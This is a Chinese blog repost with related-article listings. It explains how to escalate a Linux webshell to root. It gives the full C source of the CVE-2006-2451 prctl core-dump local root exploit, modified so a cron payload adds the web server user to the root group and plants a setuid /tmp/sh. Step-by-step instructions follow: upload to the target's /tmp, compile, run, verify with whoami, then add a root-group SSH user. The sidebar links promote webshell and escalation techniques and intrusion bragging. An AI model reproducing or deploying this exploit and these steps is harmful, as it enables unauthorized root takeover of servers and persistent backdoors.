Linux下WEBSHELL提权

转载 2012年03月30日 10:20:31

用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

前提:1、目标机上安装了GCC能编译源码

                 2、Kernel 2.6.x         (>= 2.6.13 && < 2.6.17.4)   

因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.

/**********溢出代码**************************/
/* Local r00t Exploit for:                                 */
/* Linux Kernel PRCTL Core Dump Handling                   */
/* ( BID 18874 / CVE-2006-2451 )                           */
/* Kernel 2.6.x        (>= 2.6.13 && < 2.6.17.4)                 */
/* By:                                                     */
/* - dreyer          <luna@aditel.org>         (main PoC code)         */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                        [ 10.Jul.2006 ]        */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *         root         cp /bin/sh /tmp/sh ; gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
          int child;
          struct rlimit corelimit;
          printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
          printf("By: dreyer & RoMaNSoFt\n");
          printf("[ 10.Jul.2006 ]\n\n");

          corelimit.rlim_cur = RLIM_INFINITY;
          corelimit.rlim_max = RLIM_INFINITY;
          setrlimit(RLIMIT_CORE, &corelimit);

          printf("[*] Creating Cron entry\n");

          if ( !( child = fork() )) {
              chdir("/etc/cron.d");
              prctl(PR_SET_DUMPABLE, 2);
              sleep(200);
              exit(1);
          }

          kill(child, SIGSEGV);

          printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
          sleep(62);

          printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
          system("/tmp/sh -p");
}

把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp (有时候需要执行几次才能成功).

用whoami命令看下你会发现你的WEBSHELL权限是ROOT.

char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~

webshell提权拿服务器方法总结

今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell的提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是...
  • xysoul
  • xysoul
  • 2015年03月20日 14:12
  • 1795

中国菜刀远程webshell管理工具

我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具...
  • lz2738488321
  • lz2738488321
  • 2013年04月10日 10:28
  • 2488

最全的Webshell提权方法总结

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有...
  • xysoul
  • xysoul
  • 2015年03月20日 15:42
  • 4525

从aspx到webshell肉鸡

笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即...
  • zaiyong
  • zaiyong
  • 2014年05月15日 10:17
  • 2597

无webshell的UDF提权

1.导入udf提权。 因为已经是mysql的root了,所以肯定考虑用udf直接提权。现在本地虚拟机测试成功了再跑去测试目标机器,这样子安全点。首先在虚拟机搭建wamp环境,用手里的一个可以执行成功...
  • justincom
  • justincom
  • 2016年08月11日 16:48
  • 3089

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...
  • yaofeiNO1
  • yaofeiNO1
  • 2017年03月17日 20:04
  • 1836

Linux提权:从入门到放弃

转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,...
  • earbao
  • earbao
  • 2017年03月23日 09:25
  • 4285

Linux系统提权思路

渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版...
  • bnxf00000
  • bnxf00000
  • 2017年03月22日 11:22
  • 4458

百度站长平台“爆”dede后台直取webshell

百度站长平台“爆”dede后台直取webshell2013-09-08      0 个评论       作者:Rieck收藏    我要投稿利用百度站长平台找出5W“dede核心”站点,如果有技术的...
  • forest_fire
  • forest_fire
  • 2016年03月21日 11:12
  • 556

linux内核通用提权漏洞expliot 脏牛Dirty COW

[-] 0x01 漏洞简介0x02 漏洞危害0x03 影响范围0x04 漏洞测试0x05 测试代码0x06 测试结果0x07 修复方案 0x01 漏洞简介 Linux内核在处理内存写时...
  • SysProgram
  • SysProgram
  • 2016年11月04日 13:17
  • 4349
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Linux下WEBSHELL提权
举报原因:
原因补充:

(最多只允许输入30个字)